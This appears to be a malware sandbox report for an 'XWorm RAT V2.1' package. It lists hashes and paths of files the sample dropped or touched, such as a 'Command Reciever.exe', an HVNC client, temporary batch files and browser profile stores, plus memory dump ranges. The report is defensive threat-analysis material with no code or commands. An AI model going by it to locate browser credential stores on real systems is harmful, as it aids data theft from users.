SHA256 3d0223e1f8bb35870db41872cfbbe467f65bf9a1208dcb4d4ad874e250ccc10a
SHA512 02b168ef9cc226a08955092173c3745a55b28faa438b8152acb90d3bc1d9f433de7d8341def8b452db1986392a59cabc7c69689ad00825c58371ca78021183be

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d9b8c1f882ff65574e707668f8052e39
SHA1 3c8f7a9775ff1af5b82e7f66497c810bc14c0805
SHA256 f18623dac929c1e4622e91b57a40318b8995ec7fa7de8f1e1fac9dd2fa5b98f5
SHA512 d7f0630ba99638b6618b39f2d0bd1887fbb00793c0eac0a10eaf57be5a4596427365987e7afda329c7b58f6d0829ea764ad8968807a0efd716500a3930be702b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 5074e20188a773980812a6329527e342
SHA1 0ecaeeb316298b5b59f7894769ee91997fffb346
SHA256 9e147459533ab004a57528f8666d3897c92bd61c162748f506e9cb50c88068fc
SHA512 41981d5cf1ddbe706cbd85da59fed923d58ba5da3b037ad8c6f3e9f193fce821ecabefd5245ecffc12f21fbeba650e07cbf2590a46cbf7b1c57c3bb5507c6df2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58080a.TMP

MD5 de43feeb209fd6c67537a614267d6aac
SHA1 93381574b34f9fb11b30b5f80a87a0bfc7351bdc
SHA256 6a1851bc0d0268641a4acc0be85df0cf9f6e80fb6a79ef0ddcf4f76e333d876a
SHA512 49ed085666f62df08dae5eb6d76427fa35d666aa47a5f95b141fdaae1e1aa94ddd56d6b7d2e8746c012c959d7f49ece748cf3825fd991ae6eeb9f6e2fbec3c76

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f0d89aa56c19131cc011e24a1059c256
SHA1 34afc1c883987b7c92c2d44e139c0a4c7b9d7fb8
SHA256 91083e08bd45470a9b31954da4a31ff7c4827904cb706d1249648c0239451088
SHA512 302e7d2871b94a46c0e0fd88ba75ebee951eeae3e04758e43bb6fedceaa470930d158d38d0b2d634953e169178522bd18fc489b0df81eb3094f9b7f4d4b75754

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 6a9b8931fbda78df9e48a9817040a32c
SHA1 cd34bc7f7d9a3f646cc1b49afdbfe84673da3899
SHA256 739da4f032f53c21390ddd663d555c5021f1b27c9b68866049eeaa8298454e7a
SHA512 eea67dd976661abde3693d3cf6971489fe4c6f067fe917d8b585bdf2dcee308c2622f122354e6796964181f84f9059a42c74932113b0696e597de184dd69d92f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 622ffa73ef846c9bdc47501ba539e5fb
SHA1 3b656b837012580b8f4f685364758a7025cdf88d
SHA256 ea28f502e1685a8ed3b5c3275b118b3ed1705f7678a12e201b80f532398a8a28
SHA512 c27c2e9d62a0fed8612feb2f923236888b891a2868ca38e6f7325241c4e1b70fc6d78a5246674d32db1b7f35695a9142385e1df74e73226aa936368edc855909

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 c269d71b514cc53e6c760a7eb56e4302
SHA1 5c8e23c901797e46d39d590c070d654d4560a21e
SHA256 4106cb40a37cab081ec1c9db10c6c1faeeee97e2c488d5bd52b6b0d520b6237e
SHA512 61b45d9f7d9f623d5096ce603a87806b706a9a676fcbb21ad6df0692df3e04674a1f33ea186dc440d2a0f51ada36ef2469e9731f47d1e774c2b3b3ca8e4b35a3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 01053c7f0e1896c374fb0832f8afb3c3
SHA1 c34085daa61329aa516016c83bddc7ebe1f35a52
SHA256 41a4a0bef0ebb94fb2a3135d6d72827f2bba7838a1c282cf3bcc844e91b248e1
SHA512 acc1d0a5839f453960c9519b5d191b8c8160037c4f6bf16d2644f1629c807f92cbd7a8659bf1a74b49f4ca4908e797f0814a9e2ea81aadce36cfb9d1dfc5ed37

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 4e4f23bac2e71f8532e2a061126e1bf4
SHA1 c78a0b22cd95b17dc5d758676f19e998b1d20b98
SHA256 1e37a6ce080a240913afb198c44964d6eeff861ffe2306c599e2955de93fca0e
SHA512 b5db4b657cc201017dd9f00e50a72ad77a3f28e0dd1e2b346f9e065b7a84149e759c11e69a6d45ad1f09972b0904662110b0e4a95186d5a91de4aa7021388503

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 c35b1f519f8e32cd2502449f4232a8db
SHA1 1d5ce075e9c34e17b2e6258092f1e10aca40e34b
SHA256 10cf1ffadf87d6d4a8268b697d2e18615f9290641d9c36988fc05c06ffa7c574
SHA512 c69881cdd387f2295972e331d8901e10921e7e6ed447352f298f22e39e621a757b4dc4cd13497380355d49b82acddf3325b1daf691f034fa90b33716aed0df1c

C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main.zip

MD5 88dfc456336a95ffeac16d9276083b7b
SHA1 8949c8c8778bd6412a456212d4ba2707f12e9d7a
SHA256 edbdc2e1bed353b533761a069b2d9a563683318fd1657ce09f9be2fa8ccd497a
SHA512 988ec72613d155bc362b1c0e0f1ee731f9653947328084e96eb436e7576b8e9c5114e59488216ea4f05d48126c5dbd7e983a02a412755b59b961f15c3ceea5f5

memory/1184-560-0x0000000000780000-0x00000000009C2000-memory.dmp

memory/1184-561-0x00000000743A0000-0x0000000074B51000-memory.dmp

memory/1184-562-0x0000000005960000-0x0000000005F06000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe

MD5 b8703418e6c3d1ccd83b8d178ab9f4c9
SHA1 6fb0e1e0ee5bc745f52a1c29e3cf4b88a2298dd6
SHA256 d6e9972976881d3dad7ac2a0c66cd7dd81420908aae8b00195a02fdf756cfc5e
SHA512 75ff6e911691e3d0d32c25d4b6d275a2b6157dae418ce5507f3e3f1b321c3f0dee516b7db0fd6588860019a19862f43c5335c465829de7a418a71999b71cfc3f

C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe:Zone.Identifier

MD5 640d524e902154387c7753caa8f354cd
SHA1 f26c3bd6504c691049b70127acd4541d0bb121f5
SHA256 44343939c5c0e594f307bcb9fc79669ea0213df316d5f3b4a557afa8acf2d665
SHA512 0eab3ce3739eb6bcf5055381c6718744e743e62e0069b80afdc3710dc46c7672b469aad84c566fd48006b7e6667b5e5f223adf496052155c259126718fa1bcd7

memory/1184-593-0x00000000743A0000-0x0000000074B51000-memory.dmp

memory/1908-595-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp

memory/1908-594-0x0000014039C00000-0x000001403A1A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

MD5 65ccd6ecb99899083d43f7c24eb8f869
SHA1 27037a9470cc5ed177c0b6688495f3a51996a023
SHA256 aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512 533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

memory/1908-601-0x0000014054740000-0x00000140547B6000-memory.dmp

memory/1908-602-0x0000014054730000-0x0000014054740000-memory.dmp

memory/1908-603-0x000001403A670000-0x000001403A68E000-memory.dmp

memory/1908-611-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp3771.tmp.bat

MD5 f707475f6adc528f4ee6820749405e7a
SHA1 2b160ebaf73acead8b48e87862d1ccccabe50ac0
SHA256 474a14c16621941cc5ab64ea6ee2f78c823078cc5e27f2da12e3ec77bfa999de
SHA512 caee0f74edfda2cba961f231484e8d5aa3c2a4769bce420069c48fdec8b5b6a1b771cbd9413579057d78f439361e9c6723a2589ec66906675e7b4d8cb8f31f43

memory/3016-615-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp

memory/3016-618-0x0000015941750000-0x0000015941760000-memory.dmp

memory/2392-620-0x00000000743A0000-0x0000000074B51000-memory.dmp

memory/2392-619-0x0000000000740000-0x000000000092A000-memory.dmp

memory/2392-621-0x00000000052A0000-0x0000000005332000-memory.dmp

memory/2392-622-0x0000000005340000-0x00000000053DC000-memory.dmp

memory/2392-623-0x00000000053F0000-0x0000000005456000-memory.dmp

memory/2392-624-0x0000000005510000-0x0000000005520000-memory.dmp

memory/2392-625-0x0000000006300000-0x000000000630A000-memory.dmp

memory/2392-626-0x0000000006540000-0x0000000006764000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1a5fdae6-8f46-4b8b-a738-d6572f690d43\AgileDotNetRT.dll

MD5 14ff402962ad21b78ae0b4c43cd1f194
SHA1 f8a510eb26666e875a5bdd1cadad40602763ad72
SHA256 fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b
SHA512 daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b

memory/2392-634-0x0000000072DA0000-0x0000000072E2A000-memory.dmp

memory/2392-635-0x0000000005510000-0x0000000005520000-memory.dmp

memory/2392-636-0x0000000005510000-0x0000000005520000-memory.dmp

memory/3016-637-0x0000015943110000-0x000001594311A000-memory.dmp

memory/3016-638-0x000001595BEB0000-0x000001595BF1A000-memory.dmp

memory/3016-640-0x000001595C8A0000-0x000001595C952000-memory.dmp

memory/3016-641-0x000001595C9A0000-0x000001595C9F0000-memory.dmp

memory/3016-642-0x000001595C950000-0x000001595C972000-memory.dmp

memory/3016-644-0x000001595CA30000-0x000001595CA6A000-memory.dmp

memory/3016-645-0x000001595C9F0000-0x000001595CA16000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

MD5 12a21eb44a2ab50f137c6f9450517a5b
SHA1 01b4c3bc7267a3679b6155a04c28994fde11fe70
SHA256 4986256bdd93a6909d366aed1d5d9cfa294977eba2849964cde5e3a7de2c4460
SHA512 a459a1bcbe3671e0d798415fb78c59dfcd5a7e63e00dae2805b1921f21289f197885a6b7be7b0e1e8563c55445f386b17bbd6943e318a4ab3c5f624966e90591

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

MD5 cee3c16a92f3ae390c4e75fd88c28056
SHA1 38094e5ca91a5f45bf10f7c4806cc78c512cd32b
SHA256 816cfe2684e18854e81448ccac7abecd961cca1cc1fb78c82b3e5bd5c7a9070f
SHA512 5125a51dcb07c97ca851fa4db7707665624ba940c4ead87aea70696135fe09ac32891c0eea6772eedf25f2a3403456bd4edb8291f76971ee3e5da38508acce3c

memory/3016-667-0x000001595C980000-0x000001595C992000-memory.dmp

memory/3016-671-0x0000015941750000-0x0000015941760000-memory.dmp

memory/3016-676-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XWorm RAT V2.1.exe.log

MD5 f806bfa68f99d4a19d806595611717b6
SHA1 e83964cc47b297499f0add7d54aa237450fa4744
SHA256 2d5ab2f4a9040dcf4444eee974461311f43e017406382778aa8c83a87c0c857a
SHA512 12e35d2c49733241638c073a64679458fc24a0d06b4db735a0e86883a06167021900b9b3aad8bbb2d6701b61a6d049cc9d02a17de98fd2b1a394b6fb27d86119

memory/3016-678-0x0000015941750000-0x0000015941760000-memory.dmp

memory/1884-679-0x00000000743A0000-0x0000000074B51000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 1ba49875f796d1a52b1610256883bc1a
SHA1 a80aeb33640a76f2165223d9335aa6e3005cfa8d
SHA256 0f0272e587441d8426f20a514649532163dbfd3371aecfd21ddb4c81f10d5801
SHA512 eda00d0531758cf15caa37589a2a016780ff713442fce7ec30fe9c489137fa02aa1f5606ae58e24428f1459f72eb02236efed2e3e6284b2d02c508c02370ad36

memory/2392-700-0x00000000743A0000-0x0000000074B51000-memory.dmp

memory/2392-711-0x0000000005510000-0x0000000005520000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Command Reciever.exe.log

MD5 f6124be7822087101cfaca65733653f4
SHA1 cc40c3110d3ae90008b0a4930259a0c18bba1703
SHA256 4451dab0c07cb97f3f4e71be86ebb6f895b139a13a6c1df97ca5028a216f6925
SHA512 f4bc2d963e9aecc93cb2d602b94c95521d461483665d128d0d4b7266b5686691973e6496706d9cd35816cd946a38c9c1c6482b80c264588eefdfafb69ac59835

memory/2392-712-0x0000000005510000-0x0000000005520000-memory.dmp

memory/2132-713-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp

memory/1884-714-0x00000000743A0000-0x0000000074B51000-memory.dmp

memory/2392-716-0x0000000005510000-0x0000000005520000-memory.dmp

memory/2392-722-0x0000000005510000-0x0000000005520000-memory.dmp

memory/2132-724-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp9AFE.tmp.bat

MD5 372f5beacd09339c63ef9cd5ed724628
SHA1 653c569cbb98c62ad198c6e974a402b01690e25b
SHA256 d97292aae3be8601c699c2f066c290b378f3f92b18dcfcd44d11cf23549a6f95
SHA512 722c631b01ea81b6944835b7daaea0fccf55f8413e74ea56126bb07c1f76f19df4dac8008456e5c788fc7ec3f435fc8eef1a300a7fe698854439fd03c6de50f6

memory/3016-727-0x0000015941750000-0x0000015941760000-memory.dmp

memory/4348-728-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp

memory/4348-731-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp

memory/2392-732-0x000000000BAC0000-0x000000000BBE0000-memory.dmp

C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe

MD5 b46353715bb880e30d84414b335b6fd8
SHA1 107b40a28744a1e3e3a99497070664d483877f04
SHA256 6eab6250d1f51a740b8a298dc7dddb43787221d5bfcd4b60be2127b74af2f98c
SHA512 3cba43192f05843da9e01b8167d35c2c886f60004182988c5bea024e38c7c5a94b1b1f245356559e535159f4b254bcebe572d395d1fce75469474036d3c882ea

memory/2840-737-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp

memory/2840-736-0x0000000000300000-0x0000000000316000-memory.dmp

memory/2840-738-0x000000001B2E0000-0x000000001B2F0000-memory.dmp

memory/2952-739-0x0000000000400000-0x0000000000416000-memory.dmp

memory/2840-741-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp

memory/2952-742-0x00000000743A0000-0x0000000074B51000-memory.dmp

memory/2952-743-0x0000000005B20000-0x0000000005B30000-memory.dmp

memory/2392-747-0x0000000005F60000-0x0000000005F74000-memory.dmp

memory/2952-748-0x00000000743A0000-0x0000000074B51000-memory.dmp

memory/2952-749-0x0000000005B20000-0x0000000005B30000-memory.dmp

memory/3156-755-0x0000000009010000-0x00000000097CA000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 6bc408666fcaf29a881bb1e206a2e990
SHA1 a00e5d564651d930e48632519d6f467c0df5b485
SHA256 ffdf9debe7e7136aaf5297e7c7d70b49ba93d69b0156d87d1cf53338230a268e
SHA512 e7fa33526e6c0df4485bd794b97e0b600ebab8b33ab945de3a751e70a99c82134f5f6dead9e363de155135f5190a380036328dc585f922468d058d76ef1a1f26

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\4a8beac1-80f9-49c1-8b85-8e7af79a70c1.tmp

MD5 a526cb0247e44dab16c82785720581f9
SHA1 b941a599a87cdbba6a204f727464686d9a3aed58
SHA256 5ff1602a8378555f1b1a074062af6108f964b593ab0f9cf7324de257f196e910
SHA512 c91cae4e20af8f153e139f3f9c745492f240ff7f5e59dc1cacd54913ed4e7da2eebad6cf32d3bbceb66f02ec648e8d0cf6cdfd731bf543a034da0475722f3a32

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 2e6798b7e2f990bb598295638d81db91
SHA1 95996ce80f0aedf3fc9ae33b67e2d6d994f6f9dd
SHA256 7ea97cd51d818429b0c9468dc32b10fa3968d73416023b72ec10825694c5ac08
SHA512 b01c9912fcdf753cc962fbb9a7eeb47e0c38dbe77c289d2849fcda504a027b16f12b01c3bc4f33e98407b9509f78a4c413cd22e8991ff32d6187c1d9923d4b53

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 a784a3f2156d96e6051801c610c65a7c
SHA1 d9c6e10d0cd17c1056fd956393d8d258a1d2bbc5
SHA256 882f5bfad8990a678ddac345639452d39be4e7ba4837238458382615707cb416
SHA512 5c707ec82a027d3da0cae9ea0adde12d16f65e0abd4cfdd56b89c49539b03e1d91303070be1708df21c9b40241201f98c09ea56d6d27a884f35525b9388c1e7c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\988afb84-58df-45b5-bc03-b6f0cf0f3f88.tmp

MD5 92dd930f2b5a7fa3a7a49727b89a2c2d
SHA1 9ca174f88dadc0dead7d275f35175c84f4cec2bc
SHA256 fa682c76e01cf5c63ad5acc58fcf1f51a567dbb5b05e7b5a004ba93df39491b6
SHA512 5e16dd5669eb77085a4c1b2197c495512ff583f680f604765e151367f0c769d6fe02a9b9e0531b1d28a4ff5421995cbedd4ce4c2fc0fd35189da963f036014f4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 f589c7638efc1d2a9f24b85da3664a63
SHA1 ee8f84171f8df24550843c6553f6742a9e628103
SHA256 313e27023ce0a27110c095ec9ec2061c54ea937107aef359658fb2ba1d341bdf
SHA512 3f6a5a8763ddf422aecb7cebd5f07727005578d032c11061cabfdda2d35c3c72f8b11bcf02a034b28875cdc404904a7b105e54556366791519f21f91cfd5a564

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

MD5 9eae63c7a967fc314dd311d9f46a45b7
SHA1 caba9c2c93acfe0b9ceb9ab19b992b0fc19c71cf
SHA256 4288925b0cf871c7458c22c46936efb0e903802feb991a0e1803be94ca6c251d
SHA512 bed924bff236bf5b6ce1df1db82e86c935e5830a20d9d24697efd82ca331e30604db8d04b0d692ec8541ec6deb2225bcc7d805b79f2db5726642198ecf6348b8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Browser

MD5 de9ef0c5bcc012a3a1131988dee272d8
SHA1 fa9ccbdc969ac9e1474fce773234b28d50951cd8
SHA256 3615498fbef408a96bf30e01c318dac2d5451b054998119080e7faac5995f590
SHA512 cea946ebeadfe6be65e33edff6c68953a84ec2e2410884e12f406cac1e6c8a0793180433a7ef7ce097b24ea78a1fdbb4e3b3d9cdf1a827ab6ff5605da3691724

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\GrShaderCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\ShaderCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\ShaderCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\ShaderCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Crashpad\settings.dat

MD5 b72ccf74a88b62706af12d6073b1c4bf
SHA1 af09cb48102a916c3d8e8c678b6b4a3df1a817d3
SHA256 937665e0c77b99ac62eecdd3b7a0411db2e3fd4058a9ad45e6c9ae5164849c39
SHA512 b6424efd8c5e74f3fa0bc881d3ad66dc987cbdaa7d9fc6f778f7828d4d1d92db2a6bd36122f2bcc27702f3e006972acc3f4caea163f3b4b6b41158c6e4f5598b

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\f92323cb-8f12-4c4f-83d1-edf3f02da4ea.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Local State

MD5 dcf900280f194aae7a8dad528c5f4510
SHA1 b7c22c2d96d9b57ebd6fa109cce31fd7f5278dab
SHA256 6c12842f1905ccd1887e622c2c7cf058c309458b6d5905d90c76764b5bf6344b
SHA512 405c820e91556598f37f69abdf480c1393ba97bf9789ce73f003b585f543ac0f4dc3fad83b9f71fe09a840f5a000230fbb95f5ad5816300b9a239a1655ec82e2

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Preferences

MD5 b51b73ced77d3220ea83c47fc4fe6bb9
SHA1 9b815a93ea9dff8bce0893ac73f5c64e44761e85
SHA256 c935ad4a619d11bf8bbc93cd1a5b1659c35db8a6a440fd96f64700bced5bc334
SHA512 4d4d94d544d5d6b4d0179ca8c8715f7dfa54de64da14713c0b791fdce00e671069e6d9ff706372a78ba20b3d4ebf574ce0b774f7d8813c6b445a7647c1ae7935

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\TransportSecurity

MD5 6e622bd7de2fc06539e5cfb6d4bc7c16
SHA1 842ebb0e63aba88548a5a4a9794c4d7c4a06ee80
SHA256 29804baa65c713df1155d25597643a0c4c486ccd3d1a21de15685b263b90668e
SHA512 7f9dfa5554b702e87019943999ff4788bc2aba6b3b3bb59fc9488bb92b24df5c37cc5b8ff895379db7d8766950e641a730ebc0774171cef0aa6ac479a2999b45

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Module Info Cache

MD5 b0954fb5350a94a10dab45095537f533
SHA1 684e24a3a8a2dbfbe394a17be601170b62b38f4c
SHA256 373c89abeb67c0f3f62799afdca90b403070d0aeb12f960f0d07274c32653f3b
SHA512 bb40905746730e9dbac4373f3767a6f5d0ab2f9a130dd2f91612e82612883c0c6ffb1b7129f92a903ae2b86bbc7ff8aee675f58a6ded31d2ae9088f18d448465

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Code Cache\js\index-dir\the-real-index

MD5 23ca5cba26688757b60ce503cd1ff6c4
SHA1 999d8b84b7a9a0ae054b2389480624e4ef747091
SHA256 fbf732e247eda52ff8b2356405b5a9b596eaedb4b00926543e8f5b595f9f97ca
SHA512 dd1755a649550d172634d612c396f3b077ca052dda64c1db8618b9fc479bbd10ee0bf81c21064d63f60b133a0a8d16f5965152859830cbaff35091e475df6bca

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Code Cache\js\index-dir\the-real-index~RFe5c2070.TMP

MD5 6d5a2baac4f9567d60b5642ae438876f
SHA1 b0e4768d356c2e71ade39b5894fb64c196f436bb
SHA256 cc13c8b7c907e21803ad372efecb2375e7be86f98dfa9be58e259947be0cc625
SHA512 1bbb04f639e639f34bcf8fdd341f466fea2a51fc4d67789c5d6808ba41bc106926382b2e0b9530f8b5ae8f471d9a4a27f3a83a397b7905710efe99d16e1db0ba

C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\options.vnc

MD5 24f5e966d65e79745d3303b950496810
SHA1 76b05ca8cac7a49bec0c413270e4af5ce891dbf9
SHA256 9b7645a27b48ec94958a9a95326860c811b9fb3b9d82901102671e7c64416d3f
SHA512 b77bcc8f62db51c2b120e664d9f78c1896a943d56d4e3fdf7b4520a021458181cf70457ae486b12439905351bac8df875320a02b79b0f8ad4f9eacaa00379c5d

memory/2652-1414-0x0000000002230000-0x0000000002231000-memory.dmp

memory/2652-1417-0x0000000000400000-0x0000000000502000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\Network Persistent State

MD5 3f48965a65227c6ba62a7bf6aeacda8e
SHA1 0c874bf5d42076adb21eb3e142a55b3acb36fa38
SHA256 06b67add93b9f59744fb9e3c29ddc6fc5b97df0eb0aac36cf8e5b811e0cc31c9
SHA512 018b064a6c8bffeeb9f5b78eceaee18f61f441b187f291039eaa2dbb3432e3b917056a5f0b761c2554502cf2aff297c01aede43af794fc79cdb7a67c667726bb

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\TransportSecurity

MD5 8644b46dccaa7c5ada6f9da22054a8d6
SHA1 7a32e8e55aad2be949531a771ba38a69f5cc4329
SHA256 1169de5762a6513baa32bf475c56fb48c29d3952a1f61b566f1849d2a3bed778
SHA512 f7a8ea9d669ee0899ad1847d8f3e8f026dceb48f19c298fab02d4a9f9235dc4fb24dc76d9b756212e0cf079c2045622e83ed3803e5e9602b9c39c4faeac74695

memory/3016-1452-0x0000015941750000-0x0000015941760000-memory.dmp

C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\options.vnc

MD5 856bc6b09dd64a05856ce820c5684934
SHA1 8083dbb6450d078e65b13827529b9d61c976c0c8
SHA256 09a44d59daf673d23cf41b54ae66c797915a53e3ae0b7c72ecf504918d6b28d8
SHA512 8ab164f2d0ed117fe0ac4c86799370f3e580c4ba1af9434986f5c5dd1a2a09999193f53908e96a460b05eb726b955ab9aee062996d52ccdeaddedbf6465c1bec

memory/3016-1539-0x0000015941750000-0x0000015941760000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 7bea0f508971405600ec62102b0b821b
SHA1 087fe4520987f512364cec5c523b6b29d9c36bbb
SHA256 fee6ee1b1f8e741dbad62add0bdf396dc4acbd0c486be12382b0c065579e6b70
SHA512 6208ff0ca29b7b747b7d82c5c4deb43f0a2ebf539d2c58987ab18382eff21b706c5bb2aa597ee617716310c6e648456d3f151d9d3ed78a1dd2be13a54b364c1d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 c9a6fb74aa1d29cfb0033c26d1b8e146
SHA1 0d821bba1975da8fbad900dea0a43960643f9a44
SHA256 7bd56093477f1e17114eafd35288dbe76d410616cb09fad47e8d6a3ad35d806a
SHA512 6db04f427ada78642e5918b355ea73f1aa504d2735073d26d2bf588cece0daf1118fe0d3b892689598c45c7223a53e0467cbba5f0f5e4858187b28f956aaece2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 55dc2c233cab0aca6610a34f0878cb0d
SHA1 30817dca5b80b045c1719fce1efc5e458b1f3753
